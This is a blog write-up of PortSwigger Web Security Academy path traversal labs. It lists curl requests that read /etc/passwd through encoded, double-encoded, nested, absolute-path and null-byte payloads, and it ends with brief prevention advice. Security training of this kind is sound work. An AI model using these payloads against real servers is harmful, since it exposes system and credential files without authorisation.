Post

Path Traversal

Posted
Preview Image
By
1 min read
Path Traversal

Path Traversal

Path traversal is also known as directory traversal. These vulnerabilities enable an attacker to read arbitrary files on the server that is running an application.

  • Env Variables.
  • Running program details.
  • Application code and Data.
  • Credentials for back-end systems.
  • Sensitive operating system files.

Reading arbitrary files via path traversal

Most Common way ( File path traversal, simple case)

1
2
3
4
5

[Original]
curl -s https://0a42008e046aadb78126bbdb001f000c.web-security-academy.net/image?filename=50.jpg 

[Final]
curl -s https://0a42008e046aadb78126bbdb001f000c.web-security-academy.net/image?filename=../../../../etc/passwd

Common obstacles to exploiting path traversal vulnerabilities

Attackers frequently overcome these obstacles through:

URL Encoding

Using encoded sequences like %2e%2e%2f or double-encoded %252e%252e%252f to bypass basic filters.

1
2
3
4
5
6
7
8
9
10
11
12
13

[1 way]

..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

URL Encoding it :-
curl -s https://0a610034030cdad383a16e4f00640069.web-security-academy.net/image?filename=%2e%2e%25%32%66%2e%2e%25%32%66%2e%2e%25%32%66%2e%2e%25%32%66%2e%2e%25%32%66%2e%2e%25%32%66%2e%2e%25%32%66%2e%2e%25%32%66%65%74%63%25%32%66%70%61%73%73%77%64


[2 way]

..%252f..%252f..%252fetc/passwd

curl -s https://0a610034030cdad383a16e4f00640069.web-security-academy.net/image?filename=..%252f..%252f..%252fetc/passwd

Absolute Paths

Directly referencing sensitive files from the root (e.g., /etc/passwd) to avoid using traversal sequences entirely. 

1

curl -s https://0aa6006804a1ad708104c0fb000d004e.web-security-academy.net/image?filename=/etc/passwd

Nested Sequences

Utilizing patterns like ....// which simplify to ../ when inner sequences are stripped. 

1

curl -s https://0a18008703e9344681ad8eec005a0015.web-security-academy.net/image?filename=....//....//....//....//....//....//....//....//etc/passwd

Null Byte Injection

Appending null bytes (e.g., ../../../etc/passwd\u0000.png) to truncate the file path before a required extension. 

1
2
3

curl -s https://0a34003d04a2c03680542bcf00a30033.web-security-academy.net/image?filename=../../../../../../../etc/passwd%00.jpg

curl -s https://0a34003d04a2c03680542bcf00a30033.web-security-academy.net/image?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00.jpg

Path Traversal Through Expected base folder

like this base folder path filename=/var/www/images/../../../etc/passwd

1
2
3
4
5

curl -s https://0aad00890367da0583fa78b400030033.web-security-academy.net/image?filename=/var/www/images/../../../../etc/passwd

curl -s https://0aad00890367da0583fa78b400030033.web-security-academy.net/image?filename=/var/fwww/images/..%2f..%2f..%2f..%2fetc%2fpasswd

curl -s https://0aad00890367da0583fa78b400030033.web-security-academy.net/image?filename=%2fvar%2fwww%2fimages%2f..%2f..%2f..%2f..%2fetc%2fpasswd

Non-Standard Encodings

Exploiting overlong UTF-8 encodings or non-standard characters like ..%c0%af that decoders may interpret differently. 

How to prevent a path traversal attack

Additional Measures: Store sensitive files outside the web root, disable directory listings, and keep software and dependencies updated.

  • Input Validation & Whitelisting
  • Canonicalize and Validate the Path
  • Principle of Least Privilege
  • Avoid Direct User Input
Web Exploitation
path-traversal traversal
This post is licensed under CC BY 4.0 by the author.